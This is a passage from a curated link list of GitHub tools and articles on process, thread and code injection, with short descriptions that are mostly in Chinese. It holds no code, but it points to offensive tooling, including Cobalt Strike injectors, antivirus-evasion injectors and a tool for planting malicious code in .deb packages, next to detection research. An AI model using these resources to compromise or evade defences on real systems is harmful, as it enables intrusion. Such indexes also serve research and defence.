[**126**ๆ˜Ÿ][8d] [C++] [ez8-co/yapi](https://github.com/ez8-co/yapi) fusion injector that reduce differences between x64, wow64 and x86 processes - [**111**ๆ˜Ÿ][5m] [C++] [arno0x/tcprelayinjecter](https://github.com/arno0x/tcprelayinjecter) Tool for injecting a "TCP Relay" managed assembly into unmanaged processes - [**110**ๆ˜Ÿ][16d] [Shell] [aoncyberlabs/cexigua](https://github.com/AonCyberLabs/Cexigua) Linux based inter-process code injection without ptrace(2) - [**85**ๆ˜Ÿ][1m] [C] [elfmaster/saruman](https://github.com/elfmaster/saruman) ELF anti-forensics exec, for injecting full dynamic executables into process image (With thread injection) - [**76**ๆ˜Ÿ][5y] [C++] [malwaretech/zombifyprocess](https://github.com/malwaretech/zombifyprocess) Inject code into a legitimate process - [**62**ๆ˜Ÿ][8m] [C] [kubo/injector](https://github.com/kubo/injector) Library for injecting a shared library into a Linux or Windows process - [**59**ๆ˜Ÿ][4y] [C] [infosecguerrilla/reflectivesoinjection](https://github.com/infosecguerrilla/reflectivesoinjection) ไธ€็งๅบ“ๆณจๅ…ฅๆŠ€ๆœฏ๏ผŒๅ…ถไธญไฝฟ็”จๅๅฐ„็ผ–็จ‹็š„ๆฆ‚ๅฟตๅฐ†ๅบ“ไปŽๅ†…ๅญ˜ๅŠ ่ฝฝๅˆฐไธปๆœบ่ฟ›็จ‹ไธญ - [**53**ๆ˜Ÿ][1m] [Py] [xiphosresearch/steelcon-python-injection](https://github.com/xiphosresearch/steelcon-python-injection) Python Process Injection PoC Code from my SteelCon talk in 2014 - [**52**ๆ˜Ÿ][6y] [C++] [georgenicolaou/heaveninjector](https://github.com/georgenicolaou/heaveninjector) Simple proof of concept code for injecting libraries on 64bit processes from a 32bit process - [**47**ๆ˜Ÿ][7m] [PS] [3gstudent/code-execution-and-process-injection](https://github.com/3gstudent/code-execution-and-process-injection) Powershell to CodeExecution and ProcessInjection - [**46**ๆ˜Ÿ][5y] [C++] [tandasat/remotewritemonitor](https://github.com/tandasat/remotewritemonitor) A tool to help malware analysts tell that the sample is injecting code into other process. - [**37**ๆ˜Ÿ][4m] [C] [egguncle/ptraceinject](https://github.com/egguncle/ptraceinject) ่ฟ›็จ‹ๆณจๅ…ฅ - [**31**ๆ˜Ÿ][25d] [ObjC] [cwbudde/cordova-plugin-wkwebview-inject-cookie](https://github.com/cwbudde/cordova-plugin-wkwebview-inject-cookie) Injects a cookie in order to start the sync processs with wkWebView - [**30**ๆ˜Ÿ][2y] [C++] [ntraiseharderror/unrunpe](https://github.com/ntraiseharderror/unrunpe) PoC for detecting and dumping process hollowing code injection - [**30**ๆ˜Ÿ][4m] [C#] [mr-un1k0d3r/remoteprocessinjection](https://github.com/mr-un1k0d3r/remoteprocessinjection) C# remote process injection utility for Cobalt Strike - [**16**ๆ˜Ÿ][2y] [C++] [xfgryujk/injectexe](https://github.com/xfgryujk/injectexe) Inject the whole exe into another process - [**16**ๆ˜Ÿ][1m] [C] [narhen/procjack](https://github.com/narhen/procjack) PoC of injecting code into a running Linux process - [**14**ๆ˜Ÿ][24d] [C++] [eternityx/zinjector](https://github.com/eternityx/zinjector) zInjector is a simple tool for injecting dynamic link libraries into arbitrary processes - [**10**ๆ˜Ÿ][2m] [JS] [lmangani/node_ssl_logger](https://github.com/lmangani/node_ssl_logger) Decrypt and log process SSL traffic via Frida Injection - [**10**ๆ˜Ÿ][1y] [C++] [shaxzy/vibranceinjector](https://github.com/shaxzy/vibranceinjector) Mono process injector - [**8**ๆ˜Ÿ][5y] [C++] [hkhk366/memory_codes_injection](https://github.com/hkhk366/memory_codes_injection) ๅฐ†ไปฃ็ ๆณจๅ…ฅๅˆฐๅฆไธ€ไธช่ฟ›็จ‹ไธญ๏ผŒไปฅ็›‘่ง†ๅ’Œๆ“ไฝœๅ…ถไป–่ฟ›็จ‹ใ€‚่ฟ™้€šๅธธ่ขซ็”จไฝœๆ€ๆฏ’่ฝฏไปถ - [**6**ๆ˜Ÿ][2m] [ObjC] [couleeapps/mach_inject_32](https://github.com/couleeapps/mach_inject_32) Inject libraries into 32 processes on macOS Mojave - [**6**ๆ˜Ÿ][3m] [Jupyter Notebook] [jsecurity101/detecting-process-injection-techniques](https://github.com/jsecurity101/detecting-process-injection-techniques) This is a repository that is meant to hold detections for various process injection techniques. - [**1**ๆ˜Ÿ][2y] [C++] [malwaresec/processinjection](https://github.com/malwaresec/processinjection) Repo for process injection source files - [**None**ๆ˜Ÿ][C] [realoriginal/ppdump-public](https://github.com/realoriginal/ppdump-public) ไฝฟ็”จZemana AntiMalwareๅผ•ๆ“Žๆ‰“ๅผ€ไธ€ไธช็‰นๆƒๅฅๆŸ„ๅˆฐไธ€ไธชPP/PPL่ฟ›็จ‹ๅนถๆณจๅ…ฅMiniDumpWriteDump() *** ## <a id="78df9ff3771ac1e9d9dff3eba0055d25"></a>ๆ–‡็ซ  - 2020.04 [infosecinstitute] [MITRE ATT&CK spotlight: Process injection](https://resources.infosecinstitute.com/mitre-attck-spotlight-process-injection/) - 2020.03 [jsecurity101] [Engineering Process Injection Detections -](https://posts.specterops.io/engineering-process-injection-detections-part-1-research-951e96ad3c85) - 2020.02 [vkremez] [Let's Learn: Inside Parallax RAT Malware: Process Hollowing Injection & Process Doppelgรคnging API Mix: Part I](https://www.vkremez.com/2020/02/lets-learn-inside-parallax-rat-malware.html) - 2020.01 [BlackHat] [Process Injection Techniques - Gotta Catch Them All](https://www.youtube.com/watch?v=xewv122qxnk) - 2020.01 [hakin9] [Mapping-Injection: Just another Windows Process Injection](https://hakin9.org/mapping-injection-just-another-windows-process-injection/) - 2019.12 [HackersOnBoard] [DEF CON 27 - Itzik Kotler - Process Injection Techniques Gotta Catch Them All](https://www.youtube.com/watch?v=KSDR06TO_9o) - 2019.11 [freebuf] [ATT&CKไธญ็š„่ฟ›็จ‹ๆณจๅ…ฅไธ‰้ƒจๆ›ฒ](https://www.freebuf.com/articles/web/218232.html) - 2019.11 [4hou] [ๅฎž็ŽฐWindows่ฟ›็จ‹ๆณจๅ…ฅ็š„7็งๆ–ฐๆ–นๆณ•](https://www.4hou.com/system/17735.html) - 2019.10 [Cooper] [Fileless Malware Infection And Linux Process Injection In Linux OS - Hendrik Adrian](https://www.youtube.com/watch?v=RvBj8C5okp0) - 2019.09 [freebuf] [ๅœจ้‡ๅˆฐshellcodeๆณจๅ…ฅ่ฟ›็จ‹ๆ—ถๆ‰€ไฝฟ็”จ็š„่ฐƒ่ฏ•ๆŠ€](https://www.freebuf.com/articles/system/212248.html) - 2019.09 [aliyun] [็ป†่ฏดCobalt Strike่ฟ›็จ‹ๆณจๅ…ฅ](https://xz.aliyun.com/t/6205) - 2019.09 [aliyun] [่ฟ›็จ‹ๆณจๅ…ฅๆฆ‚่ฟฐ๏ผˆไธ€๏ผ‰](https://xz.aliyun.com/t/6210) - 2019.09 [sevagas] [Process PE Injection Basics](https://blog.sevagas.com/?Process-PE-Injection-Basics) - 2019.08 [4hou] [่ฟœ็จ‹่ฟ›็จ‹shellcodeๆณจๅ…ฅ่ฐƒ่ฏ•ๆŠ€ๅทง](https://www.4hou.com/system/19852.html) - 2019.08 [cobaltstrike] [Cobalt Strikeโ€™s Process Injection: Theย Details](https://blog.cobaltstrike.com/2019/08/21/cobalt-strikes-process-injection-the-details/) - 2019.07 [fortinet] [A Deep Dive Into IcedID Malware: Part I - Unpacking, Hooking and Process Injection](https://www.fortinet.com/blog/threat-research/icedid-malware-analysis-part-one.html) - 2019.05 [4hou] [ๅ€ŸๅŠฉProcessHollowingๅ’Œไปฃ็ ๆณจๅ…ฅๆ„ŸๆŸ“ๅˆๆณ•่ฟ›็จ‹๏ผšไฟกๆฏ็ชƒๅ–ๆถๆ„่ฝฏไปถFormBookๅˆ†ๆž](https://www.4hou.com/technology/17823.html) - 2019.04 [OALabs] [Reverse Engineering Quick Tip - Unpacking Process Injection With a Single Breakpoint](https://www.youtube.com/watch?v=Min6DWTHDBw) - 2018.12 [4hou] [ๅฆ‚ไฝ•ๅ€ŸๅŠฉCOMๅฏนWindowsๅ—ไฟๆŠค่ฟ›็จ‹่ฟ›่กŒไปฃ็ ๆณจๅ…ฅ๏ผˆ็ฌฌไบŒ้ƒจๅˆ†๏ผ‰](http://www.4hou.com/system/14904.html) - 2018.11 [googleprojectzero] [ๅˆฉ็”จCOMๅ‘Windowsๅ—ไฟๆŠค่ฟ›็จ‹ๆณจๅ…ฅไปฃ็ , Part2](https://googleprojectzero.blogspot.com/2018/11/injecting-code-into-windows-protected.html) - 2018.11 [andreafortuna] [Process Injection and Persistence using Application Shimming](https://www.andreafortuna.org/dfir/malware-analysis/process-injection-and-persistence-using-application-shimming/) - 2018.11 [4hou] [ๅฆ‚ไฝ•ๅ€ŸๅŠฉCOMๅฏนWindowsๅ—ไฟๆŠค่ฟ›็จ‹่ฟ›่กŒไปฃ็ ๆณจๅ…ฅ](http://www.4hou.com/system/14133.html) - 2018.10 [freebuf] [ๅ็ง่ฟ›็จ‹ๆณจๅ…ฅๆŠ€ๆœฏไป‹็ป๏ผšๅธธ่งๆณจๅ…ฅๆŠ€ๆœฏๅŠ่ถ‹ๅŠฟ่ฐƒๆŸฅ](https://www.freebuf.com/articles/system/187239.html) - 2018.10 [360] [ๅฆ‚ไฝ•ๅฐ†.NET็จ‹ๅบๆณจๅ…ฅๅˆฐ้žๆ‰˜็ฎก่ฟ›็จ‹](https://www.anquanke.com/post/id/162914/) - 2018.10 [aliyun] [ไฝฟ็”จCOMๅฐ†ไปฃ็ ๆณจๅ…ฅๅˆฐๅ—WindowsไฟๆŠค็š„่ฟ›็จ‹ไธญ](https://xz.aliyun.com/t/3070) - 2018.10 [aliyun] [ใ€่€ๆ–‡ใ€‘ๅฆ‚ไฝ•ๅฐ†.Net็จ‹ๅบ้›†ๆณจๅ…ฅ้žๆ‰˜็ฎก่ฟ›็จ‹](https://xz.aliyun.com/t/3050) - 2018.10 [googleprojectzero] [Injecting Code into Windows Protected Processes using COM - Part 1](https://googleprojectzero.blogspot.com/2018/10/injecting-code-into-windows-protected.html) - 2018.10 [4hou] [ๅฆ‚ไฝ•้’ˆๅฏนWindowsไธญConsoleWindowClassๅฏน่ฑกๅฎž็Žฐ่ฟ›็จ‹ๆณจๅ…ฅ](http://www.4hou.com/technology/13634.html) - 2018.09 [aliyun] [windows ่ฟ›็จ‹ๆณจๅ…ฅไน‹ๆŽงๅˆถๅฐ็ช—ๅฃ็ฑป](https://xz.aliyun.com/t/2762) - 2018.08 [4hou] [Windows่ฟ›็จ‹ๆณจๅ…ฅ๏ผš้ขๅค–็š„็ช—ๅฃๅญ—่Š‚](http://www.4hou.com/system/13308.html) - 2018.08 [aliyun] [Windows่ฟ›็จ‹ๆณจๅ…ฅๆŠ€ๆœฏไน‹้ขๅค–็š„Windowๅญ—่Š‚็ฏ‡](https://xz.aliyun.com/t/2656) - 2018.08 [aliyun] [Windows่ฟ›็จ‹ๆณจๅ…ฅๆŠ€ๆœฏไน‹PROPagate็ฏ‡](https://xz.aliyun.com/t/2639) - 2018.07 [malcomvetter] [.NET Process Injection](https://medium.com/p/1a1af00359bc) - 2018.07 [4hou] [ๆ”ปๅ‡ป่€…ๅฆ‚ไฝ•ๅ‘ๆญฃๅœจ่ฟ่กŒ็š„Linux่ฟ›็จ‹ๆณจๅ…ฅๆถๆ„ไปฃ็ ](http://www.4hou.com/technology/12736.html) - 2018.07 [4hou] [Windows่ฟ›็จ‹ๆณจๅ…ฅ๏ผšๅฆ‚ไฝ•ๅฐ†ๆœ‰ๆ•ˆ่ดŸ่ฝฝ้ƒจ็ฝฒๅˆฐ็›ฎๆ ‡่ฟ›็จ‹็š„ๅ†…ๅญ˜็ฉบ้—ดไธญๆ‰ง่กŒ](http://www.4hou.com/technology/12672.html) - 2018.07 [360] [Windows่ฟ›็จ‹ๆณจๅ…ฅpayloadๅˆ†ๆž](https://www.anquanke.com/post/id/151840/) - 2018.05 [freebuf] [ๅˆฉ็”จโ€œ่ฟ›็จ‹ๆณจๅ…ฅโ€ๅฎž็Žฐๆ— ๆ–‡ไปถๅคๆดป WebShell](http://www.freebuf.com/articles/web/172753.html) - 2018.05 [4hou] [CTRL-INJECT่ฟ›็จ‹ๆณจๅ…ฅๆŠ€ๆœฏ่ฏฆ่งฃ](http://www.4hou.com/technology/11636.html) - 2018.05 [360] [้’ˆๅฏนๆ–ฐๅž‹่ฟ›็จ‹ๆณจๅ…ฅๆŠ€ๆœฏCtrl-Inject็š„ๅŽŸ็†ๅˆ†ๆž](https://www.anquanke.com/post/id/129769/) - 2018.04 [360] [ๆทฑๅ…ฅๅˆ†ๆžGet-InjectedThread่ฟ›็จ‹ๆณจๅ…ฅๆฃ€ๆต‹ๅทฅๅ…ท็š„ๅŽŸ็†ๅนถๅฐ่ฏ•็ป•่ฟ‡](https://www.anquanke.com/post/id/104339/) - 2018.04 [360] [ๆทฑๅ…ฅๅˆ†ๆžๆถๆ„่ฝฏไปถFormbook๏ผšๆททๆท†ๅ’Œ่ฟ›็จ‹ๆณจๅ…ฅ๏ผˆไธ‹๏ผ‰](https://www.anquanke.com/post/id/103429/) - 2018.04 [360] [ๆทฑๅ…ฅๅˆ†ๆžๆถๆ„่ฝฏไปถFormbook๏ผšๆททๆท†ๅ’Œ่ฟ›็จ‹ๆณจๅ…ฅ๏ผˆไธŠ๏ผ‰](https://www.anquanke.com/post/id/103403/) - 2018.03 [aliyun] [ๅˆฉ็”จGDBๅฎž็Žฐ่ฟ›็จ‹ๆณจๅ…ฅ](https://xz.aliyun.com/t/2164) - 2018.02 [endgame] [Stopping Olympic Destroyer: New Process Injection Insights](https://www.endgame.com/blog/technical-blog/stopping-olympic-destroyer-new-process-injection-insights) - 2018.01 [4hou] [ๆถๆ„่ฝฏไปถUrsnif็š„้š่”ฝ่ฟ›็จ‹ๆณจๅ…ฅๆŠ€ๆœฏๅˆ†ๆž](http://www.4hou.com/info/news/9902.html) - 2018.01 [vkremez] [Let's Learn: Dissect Panda Banking Malware's "libinject" Process Injection Module](https://www.vkremez.com/2018/01/lets-learn-dissect-panda-banking.html) - 2017.12 [4hou] [Ursnifๆถๆ„่ฝฏไปถๅ˜็งๆŠ€ๆœฏๆ–ฐๅ‡็บง๏ผŒๅˆฉ็”จTLSๅ›ž่ฐƒๆŠ€ๆœฏ่ฟ›็จ‹ๆณจๅ…ฅ](http://www.4hou.com/system/8988.html) - 2017.11 [fireeye] [Ursnif ๅ˜็งไฝฟ็”จ TLS ๅ›ž่ฐƒๆŠ€ๅทงๅฎž็Žฐ่ฟ›็จ‹ๆณจๅ…ฅ](https://www.fireeye.com/blog/threat-research/2017/11/ursnif-variant-malicious-tls-callback-technique.html) - 2017.11 [freebuf] [ไฝฟ็”จๆถๆ„่ฝฏไปถๅฐ†้š่—ไปฃ็ ๆณจๅ…ฅๅทฒ็Ÿฅ่ฟ›็จ‹็š„ๆธ—้€็ ”็ฉถ](http://www.freebuf.com/articles/system/153795.html) - 2017.11 [OALabs] [Unpacking Process Injection Malware With IDA PRO (Part 2)](https://www.youtube.com/watch?v=kdNQhfgoQoU) - 2017.11 [OALabs] [Unpacking Process Injection Malware With IDA PRO (Part 1)](https://www.youtube.com/watch?v=ScBB-Hi7NxQ) - 2017.10 [securityintelligence] [Diving Into Zberpโ€™s Unconventional Process Injection Technique](https://securityintelligence.com/diving-into-zberps-unconventional-process-injection-technique/) - 2017.09 [4hou] [ๆ— ้œ€Ptraceๅฐฑ่ƒฝๅฎž็ŽฐLinux่ฟ›็จ‹้—ดไปฃ็ ๆณจๅ…ฅ](http://www.4hou.com/technology/7614.html) - 2017.09 [gdssecurity] [Linux ่ฟ›็จ‹ๅ†…ไปฃ็ ๆณจๅ…ฅ๏ผˆๆ— ้œ€Ptrace๏ผ‰](https://blog.gdssecurity.com/labs/2017/9/5/linux-based-inter-process-code-injection-without-ptrace2.html) - 2017.08 [pediy] [[็ฟป่ฏ‘]ๅ็งๆณจๅ…ฅๆŠ€ๅทง:ๅ…ทๆœ‰้€š็”จๆ€ง็š„่ฟ›็จ‹ๆณจๅ…ฅๆŠ€ๅทง็ ”็ฉถ](https://bbs.pediy.com/thread-220500.htm) - 2017.07 [4hou] [ๅ็งๆต่กŒ่ฟ›็จ‹ๆณจๅ…ฅๆŠ€ๆœฏ่ฏฆ็ป†ๅˆ†ๆž](http://www.4hou.com/technology/6735.html) - 2017.07 [360] [10็งๅธธ่ง็š„่ฟ›็จ‹ๆณจๅ…ฅๆŠ€ๆœฏ็š„ๆ€ป็ป“](https://www.anquanke.com/post/id/86463/) - 2017.07 [endgame] [10็ง่ฟ›็จ‹ๆณจๅ…ฅๆŠ€ๆœฏ๏ผšๆ™ฎ้€šๅ’Œๆต่กŒ็š„่ฟ›็จ‹ๆณจๅ…ฅๆŠ€ๆœฏ่ฐƒๆŸฅ](https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process) - 2017.07 [vulnerablelife] [Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injectionย Techniques](https://vulnerablelife.wordpress.com/2017/07/18/ten-process-injection-techniques-a-technical-survey-of-common-and-trending-process-injection-techniques/) - 2017.07 [microsoft] [Detecting stealthier cross-process injection techniques with Windows Defender ATP: Process hollowing and atom bombing](https://cloudblogs.microsoft.com/microsoftsecure/2017/07/12/detecting-stealthier-cross-process-injection-techniques-with-windows-defender-atp-process-hollowing-and-atom-bombing/) - 2017.07 [struppigel] [Process Injection Info Graphic](https://struppigel.blogspot.com/2017/07/process-injection-info-graphic.html) - 2017.07 [freebuf] [pyrasite โ€“ ๅ‘python่ฟ›็จ‹ๆณจๅ…ฅไปฃ็ ๅทฅๅ…ท](http://www.freebuf.com/sectool/139120.html) - 2017.05 [MalwareAnalysisForHedgehogs] [Malware Analysis - Code Injection via CreateRemoteThread & WriteProcessMemory](https://www.youtube.com/watch?v=W_rAxPm4TTU) - 2017.04 [4hou] [ๅœจLinuxไธ‹ไฝฟ็”จptraceๅ‘sshd่ฟ›็จ‹ๆณจๅ…ฅไปปๆ„ไปฃ็ ](http://www.4hou.com/technology/4446.html) - 2017.03 [360] [DoubleAgent๏ผšไปฃ็ ๆณจๅ…ฅๅ’ŒๆŒไน…ๅŒ–ๆŠ€ๆœฏ--ๅ…่ฎธๅœจไปปไฝ•Windows็‰ˆๆœฌไธŠๆŽงๅˆถไปปไฝ•่ฟ›็จ‹](https://www.anquanke.com/post/id/85775/) - 2017.03 [] [DoubleAgentๆŠ€ๆœฏ๏ผšไปปๆ„่ฟ›็จ‹ไธ‹ไปฃ็ ๆณจๅ…ฅไธŽๆƒ้™็ปดๆŒ](http://0day5.com/archives/4364/) - 2017.03 [microsoft] [Uncovering cross-process injection with Windows Defender ATP](https://cloudblogs.microsoft.com/microsoftsecure/2017/03/08/uncovering-cross-process-injection-with-windows-defender-atp/) - 2017.02 [4hou] [32ไฝ็จ‹ๅบๅฏน64ไฝ่ฟ›็จ‹็š„่ฟœ็จ‹ๆณจๅ…ฅๅฎž็Žฐ](http://www.4hou.com/technology/3426.html) - 2016.02 [360] [linux-inject๏ผšๆณจๅ…ฅไปฃ็ ๅˆฐ่ฟ่กŒ็š„Linux่ฟ›็จ‹ไธญ](https://www.anquanke.com/post/id/83423/) - 2015.08 [pediy] [[ๅŽŸๅˆ›]win7 32ไฝ่ฟ›็จ‹ๆณจๅ…ฅ64ไฝ่ฟ›็จ‹](https://bbs.pediy.com/thread-203762.htm) - 2015.08 [christophertruncer] [Injecting Shellcode into a Remote Process with Python](https://www.christophertruncer.com/injecting-shellcode-into-a-remote-process-with-python/) - 2015.08 [pediy] [[ๅŽŸๅˆ›]็บฏC++็ผ–ๅ†™Win32/X64้€š็”จShellcodeๆณจๅ…ฅcsrss่ฟ›็จ‹.](https://bbs.pediy.com/thread-203140.htm) - 2015.08 [securestate] [Injecting Python Code Into Native Processes](https://warroom.securestate.com/injecting-python-code-into-native-processes/) - 2015.08 [securestate] [Injecting Python Code Into Native Processes](https://warroom.rsmus.com/injecting-python-code-into-native-processes/) - 2015.05 [redcanary] [What Red Canary Detects: Spotlight on Process Injection](https://redcanary.com/blog/what-red-canary-detects-process-injection/) - 2015.04 [pediy] [[ๅŽŸๅˆ›]ไธ€ไธชWin7X64ๅ†…ๆ ธๆณจๅ…ฅ32ไฝ่ฟ›็จ‹็š„ไพ‹ๅญ](https://bbs.pediy.com/thread-200027.htm) - 2014.07 [pediy] [[ๅŽŸๅˆ›]C++่ฟ›็จ‹ๆณจๅ…ฅ๏ผˆ้€š่ฟ‡่ฟœ็จ‹็บฟ็จ‹ๆณจๅ…ฅ่ฟ›็จ‹๏ผ‰](https://bbs.pediy.com/thread-190291.htm) - 2014.06 [lastline] [Dissecting Payload Injection Using LLama Process Snapshots](https://www.lastline.com/labsblog/dissecting-payload-injection-using-llama-process-snapshots/) - 2014.05 [talosintelligence] [Betabot Process Injection](https://blog.talosintelligence.com/2014/05/betabot-process-injection.html) - 2014.03 [pediy] [[ๅŽŸๅˆ›]ๆณจๅ…ฅๅฎ‰ๅ“่ฟ›็จ‹,ๅนถhook javaไธ–็•Œ็š„ๆ–นๆณ•](https://bbs.pediy.com/thread-186054.htm) - 2013.05 [lhj0711010212] [ไฝฟ็”จinjectsoๆŠ€ๆœฏๆณจๅ…ฅmtrace๏ผŒๅฏน่ฟ›็จ‹่ฟ›่กŒๅ†…ๅญ˜ๆฃ€ๆต‹](https://blog.csdn.net/lhj0711010212/article/details/8999413) - 2013.04 [pediy] [[ๅŽŸๅˆ›]ๅฆ็ฑปๆณจๅ…ฅ ๅ‚€ๅ„ก่ฟ›็จ‹ๆต‹่ฏ•](https://bbs.pediy.com/thread-170530.htm) - 2013.03 [pediy] [[ๅŽŸๅˆ›]<<ๆธธๆˆๅค–ๆŒ‚ๆ”ป้˜ฒ่‰บๆœฏ>>ๆณจๅ…ฅ2.3่Š‚ไพ่ต–ๅฏไฟก่ฟ›็จ‹ๆณจๅ…ฅ](https://bbs.pediy.com/thread-163701.htm) - 2013.01 [pediy] [[ๅŽŸๅˆ›]ๅคš็งๆณจๅ…ฅ่ฟ›็จ‹](https://bbs.pediy.com/thread-161250.htm) - 2012.04 [dreamofareverseengineer] [Identifying malicious injected code in Legit Process through dynamic analysis:](http://dreamofareverseengineer.blogspot.com/2012/04/identifying-malicious-injected-code-in.html) - 2011.07 [firebitsbr] [Syringe utility provides ability to inject shellcode intoย processes](https://firebitsbr.wordpress.com/2011/07/08/syringe-utility-provides-ability-to-inject-shellcode-into-processes/) - 2010.10 [pediy] [[ๅŽŸๅˆ›]ๅŠซๆŒๆญฃๅœจ่ฟ่กŒ่ฟ›็จ‹็š„EIPๆณจๅ…ฅไปฃ็ ็š„ๆ–นๆณ•](https://bbs.pediy.com/thread-122890.htm) - 2010.08 [pediy] [[ๅŽŸๅˆ›]ๅˆ›ๅปบ่ฟœ็จ‹็บฟ็จ‹๏ผŒๅฐ†ไปฃ็ ๆณจๅ…ฅๅˆฐๅ…ถๅฎƒ่ฟ›็จ‹ไธญๆ‰ง่กŒ](https://bbs.pediy.com/thread-119091.htm) - 2010.08 [console] [Bypassing AntiVirus With Process Injection](http://console-cowboys.blogspot.com/2010/08/bypassing-antivirus-with-process.html) - 2007.12 [pediy] [[ๅŽŸๅˆ›]่ฟ›็จ‹ๆณจๅ…ฅโ€”โ€”ไธ€ไธชๅŒๆ—ถๆ”ฏๆŒWin98, WinMe, Win2000, WinXp ็š„ๆ–นๆณ•(ๆบไปฃ็ ๅŠ ่ฏฆ็ป†ๆณจ้‡Š)](https://bbs.pediy.com/thread-56751.htm) - 2007.04 [pediy] [[ๅŽŸๅˆ›]ไธ‰็บฟ็จ‹..่ฟ›็จ‹ไฟๆŠค@่ฟœ็บฟ็จ‹็›ดๆŽฅไปฃ็ ๆณจๅ…ฅ for Delphi](https://bbs.pediy.com/thread-42594.htm) - 2004.06 [pediy] [็”จ่ฟ›็จ‹ๆณจๅ…ฅๆฅๅฎž็Žฐไธ€ไธชๅฃณ](https://bbs.pediy.com/thread-1564.htm) # <a id="3b2252d379d384475de4654bd5d0b368"></a>็บฟ็จ‹ๆณจๅ…ฅ *** ## <a id="9ff33dd10584407a654590a7cf18c6f0"></a>ๅทฅๅ…ท - [**49**ๆ˜Ÿ][2y] [C] [vallejocc/poc-inject-data-wm_copydata](https://github.com/vallejocc/poc-inject-data-wm_copydata) A tiny PoC to inject and execute code into explorer.exe with WM_SETTEXT+WM_COPYDATA+SetThreadContext *** ## <a id="a7433a31e0f33f936d15d6ad61437bc6"></a>ๆ–‡็ซ  - 2020.03 [trustedsec] [Avoiding Get-InjectedThread for Internal Thread Creation](https://www.trustedsec.com/blog/avoiding-get-injectedthread-for-internal-thread-creation/) - 2018.12 [pediy] [[ๅŽŸๅˆ›]่ฟœ็จ‹็บฟ็จ‹ๆณจๅ…ฅ่ฎก็ฎ—ๅ™จ](https://bbs.pediy.com/thread-248676.htm) - 2018.04 [xpnsec] [PowerShell่„šๆœฌGet-InjectedThreadๅฏๆžšไธพ่ฟ›็จ‹, ๅนถๅˆคๅฎš่ฟ›็จ‹ๆ˜ฏๅฆ่ขซๆณจๅ…ฅ. ๆ–‡็ซ ่งฃ้‡Š่„šๆœฌ็›‘ๆต‹ๅŽŸ็†, ไปฅๅŠ็ป•่ฟ‡ๆญค็ง็›‘ๆต‹็š„ๆ–นๅผ](https://blog.xpnsec.com/undersanding-and-evading-get-injectedthread/) - 2018.03 [pediy] [[ๅŽŸๅˆ›]้ฉฑๅŠจๆณจๅ…ฅ็”จๆˆท็บฟ็จ‹ไน‹่ทจsession้€š็Ÿฅcsrssไน‹็œŸๆญฃ่งฃๅ†ณ](https://bbs.pediy.com/thread-225047.htm) - 2017.10 [pediy] [[ๅŽŸๅˆ›]ReflectiveLoader๏ผˆ่ฟœ็จ‹็บฟ็จ‹็š„ๆณจๅ…ฅ PE็š„ไฟฎๆญฃ๏ผ‰](https://bbs.pediy.com/thread-222187.htm) - 2017.05 [4hou] [ๅ…ๆ€ๆ–ฐๅงฟๅŠฟ๏ผšๅˆฉ็”จ็บฟ็จ‹ๅฐ†ๆถๆ„ไปฃ็ ๆณจๅ…ฅๅˆฐๅ†…ๅญ˜ไธญ](http://www.4hou.com/technology/4819.html) - 2014.06 [dreamofareverseengineer] [Monitoring Thread Injection](http://dreamofareverseengineer.blogspot.com/2014/06/monitoring-thread-injection.html) - 2009.10 [pediy] [[ๅŽŸๅˆ›]่€็”Ÿๅธธ่ฐˆ-่ฟœ็จ‹็บฟ็จ‹ๆณจๅ…ฅ](https://bbs.pediy.com/thread-98944.htm) - 2006.02 [pediy] [[ๅŽŸๅˆ›]ShellCode็š„ๅฆๅค–ไธ€็ง็Žฉๆณ•(่ฟœ็จ‹็บฟ็จ‹ๆณจๅ…ฅShellCode)](https://bbs.pediy.com/thread-21123.htm) # <a id="02a1807b6a7131af27e3ed1002e7335a"></a>ไปฃ็ ๆณจๅ…ฅ *** ## <a id="303ed79296c5af9c74cfd49dd31a399e"></a>ๅทฅๅ…ท - [**6260**ๆ˜Ÿ][10d] [ObjC] [johnno1962/injectionforxcode](https://github.com/johnno1962/injectionforxcode) Runtime Code Injection for Objective-C & Swift - [**2386**ๆ˜Ÿ][2y] [Py] [danmcinerney/lans.py](https://github.com/danmcinerney/lans.py) ๆณจๅ…ฅไปฃ็ ๅนถ็›‘่ง†wifi็”จๆˆท - [**1685**ๆ˜Ÿ][11d] [Py] [epinna/tplmap](https://github.com/epinna/tplmap) ไปฃ็ ๆณจๅ…ฅๅ’ŒๆœๅŠกๅ™จ็ซฏๆจกๆฟๆณจๅ…ฅ๏ผˆServer-Side Template Injection๏ผ‰ๆผๆดžๅˆฉ็”จ๏ผŒ่‹ฅๅนฒๆฒ™็ฎฑ้€ƒ้€ธๆŠ€ๅทงใ€‚ - [**1470**ๆ˜Ÿ][4m] [Swift] [johnno1962/injectioniii](https://github.com/johnno1962/injectioniii) ๅœจ(ๅคง้ƒจๅˆ†)Swift4ไธญ้‡ๅ†™Xcode็š„ๆณจๅ…ฅ - [**1112**ๆ˜Ÿ][14d] [ObjC] [dyci/dyci-main](https://github.com/dyci/dyci-main) Dynamic Code Injection Tool for Objective-C - [**983**ๆ˜Ÿ][3y] [C] [cybellum/doubleagent](https://github.com/cybellum/doubleagent) Zero-Day Code Injection and Persistence Technique - [**614**ๆ˜Ÿ][16d] [C++] [breakingmalwareresearch/atom-bombing](https://github.com/breakingmalwareresearch/atom-bombing) Brand New Code Injection for Windows - [**265**ๆ˜Ÿ][5y] [C++] [breakingmalware/powerloaderex](https://github.com/breakingmalware/powerloaderex) Advanced Code Injection Technique for x32 / x64 - [**249**ๆ˜Ÿ][8y] [rentzsch/mach_star](https://github.com/rentzsch/mach_star) code injection and function overriding for Mac OS X - [**228**ๆ˜Ÿ][12d] [C++] [marcosd4h/memhunter](https://github.com/marcosd4h/memhunter) Live hunting of code injection techniques - [**214**ๆ˜Ÿ][17d] [C] [peperunas/injectopi](https://github.com/peperunas/injectopi) ไธ€ๅ †Windows ไปฃ็ ๆณจๅ…ฅๆ•™็จ‹ - [**186**ๆ˜Ÿ][7m] [ObjC] [nakiostudio/twitterx](https://github.com/nakiostudio/twitterx) Keeping Twitter for macOS alive with code injection - [**170**ๆ˜Ÿ][2y] [Py] [undeadsec/debinject](https://github.com/undeadsec/debinject) Inject malicious code into *.debs - [**116**ๆ˜Ÿ][22d] [C#] [p0cl4bs/hanzoinjection](https://github.com/p0cl4bs/hanzoinjection) injecting arbitrary codes in memory to bypass common antivirus solutions - [**91**ๆ˜Ÿ][2m] [Py] [hackatnow/cromos](https://github.com/hackatnow/cromos) 